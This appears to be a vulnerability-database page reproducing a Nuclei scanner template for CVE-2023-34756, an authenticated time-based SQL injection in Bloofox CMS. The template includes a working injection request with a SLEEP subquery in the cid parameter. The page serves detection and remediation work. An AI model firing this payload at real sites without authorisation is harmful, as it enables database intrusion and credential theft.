Lucene search
K

Bloofox v0.5.2.1 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Bloofox v0.5.2.1 SQL Injection vulnerability via cid parameter at admin pag

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-34756
14 Jun 202314:15
attackerkb
CNNVD
bloofoxCMS SQL注入漏洞
14 Jun 202300:00
cnnvd
CNVD
bloofoxCMS SQL Injection Vulnerability (CNVD-2023-52855)
16 Jun 202300:00
cnvd
CVE
CVE-2023-34756
14 Jun 202300:00
cve
Cvelist
CVE-2023-34756
14 Jun 202300:00
cvelist
NVD
CVE-2023-34756
14 Jun 202314:15
nvd
OSV
CVE-2023-34756
14 Jun 202314:15
osv
Prion
Sql injection
14 Jun 202314:15
prion
Positive Technologies
PT-2023-25002 · Bloofox · Bloofox
14 Jun 202300:00
ptsecurity
RedhatCVE
CVE-2023-34756
23 May 202504:18
redhatcve
Rows per page
id: CVE-2023-34756

info:
  name: Bloofox v0.5.2.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
  impact: |
    Authenticated attackers can exploit time-based SQL injection in the cid parameter to extract sensitive database information including user credentials and CMS configuration data from the Bloofox system.
  remediation: |
    Update Bloofox to a version newer than 0.5.2.1 that uses parameterized queries and properly validates the cid parameter in the charset settings.
  reference:
    - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
    - https://www.bloofox.com
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34756
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34756
    cwe-id: CWE-89
    epss-score: 0.04228
    epss-percentile: 0.89803
    cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: bloofox
    product: bloofoxcms
    fofa-query:
      - "Powered by bloofoxCMS"
      - powered by bloofoxcms
  tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated,vuln

http:
  - raw:
      - |
        POST /admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&action=login
      - |
        @timeout: 10s
        POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body_2, 'Admincenter')
        condition: and
# digest: 4a0a00473045022011e63e88f18661085274cd5f6efc0b9d5a2ab7d65f0c2177aa2650ae85cdb9ee022100a888f0e79379852bf3be5efec85ad4f0f7e20f7015f1894309cb3a8ce54f5648:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.04228
SSVC
29